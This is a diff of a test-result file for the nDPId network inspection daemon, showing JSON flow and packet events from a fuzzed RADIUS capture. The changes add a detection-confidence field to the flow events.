+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00721{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528997777328,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwBTlWAPwRTkLG4hk1CgxAHgcUchABHFtlAnUBFPy\/77suJLORzOzxdqID6lIaCwAAV8gbBVNQQxpuAAABNxA0sgGX0jUZ0GkvrTEvR6JJSI5kjTryeLE5ZDtRZpqfIB5gVwEzf0GZAiOA3v7qRShWEqoRNMrrQ0Ld9EZkDOPTXqYYz\/U0I\/SC+HAlACKylcNORMjkiI8OEYrbS\/uvrFsRUJm7gb3AATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0dyUAay5vcmcsIDViMjJhNzhjL2aqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284}
 00569{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528997778442,"pkt":"ABRP+4rqcNuYVcUnCABVAADABUNAAPwRTqjG4hk1CgxAHgcUchAArF9UA3cApCAevq4tL8m2+S5T0IZH68wBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3ODYvZTA6NWY6NDU6OTA6MDk6NWYvMjMwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEqtx8kLAbqN4aRfnk10cKJs="}
@@ -329,57 +329,57 @@
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01386{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1528997829855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997829855,"pkt":"AAAMB6xAABRd+4rqCABFAALbIS5AAP8RAAAKDEAlAOIZNXIQBxQCxwAAAXwCv4IsSQM3nR8wY02\/WtSNjVsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAF\/ICQlXSVNQUjEwOgkAADghDQMyNwZbIqfFATVRMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vc2dZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzZG9uLWlkPTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgC7AAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLkVyZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFahoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgYzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWUgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMeQA4IRQGAAABAhoMAAA4IRUzAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASDRiCmnK8XecKtcjM1khyyg=="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1528997833437,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997833437,"pkt":"AAAMB6xAABRP+4rqCABFAALbITBAAP8RAAAKDEAexjAZNXIQBxQCxwAAAX4Cv1biH8K0FjYkuY9BaqM1S08aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwiAkAADghDQMzNwZbIqfJATUwMzExNDgwMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1528997833703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1528997833703,"pkt":"ABRP+4rqcNuYVcUnCABFAADABiRAAPwRTcfGNBk1CgxAHgcUchAArG8ZA38ApPpRavVvUwLj8+Vom5Z2csUBNTAzMTE0ODAyODE1MDE1ODlAS2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y1EvZXM6NWY6NDU6OTA6MDk6FWYvMjMyEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEnLsj3tLTX0TFwMzSpwXcJE="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997839248,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997839248,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997839248,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997839248,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997839248,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997839248,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01289{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528997839248,"pkt":"AAAMB6xAABRP+4rqCABFAALbITKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1528997839322,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBj5AAPwRTcjG4hk1CgxAHgcVchAAkSN5C4AAiYCfkZP9IDJyM93m2y+NtRUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y2YvYjA6OWY6YmE6NGE6MGU6N2UvMjMzTw4BAAAMFwwAAAwBf\/xQEl7YRWPdxCp7KxkigG7kdUs="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01226{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"ts_msec":1528997839449,"pkt":"AAAMB6xAVRRP+4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00569{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528997839511,"pkt":"ABRP+4rqcNuYVcUnCABlAADABkJAAPwRTaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
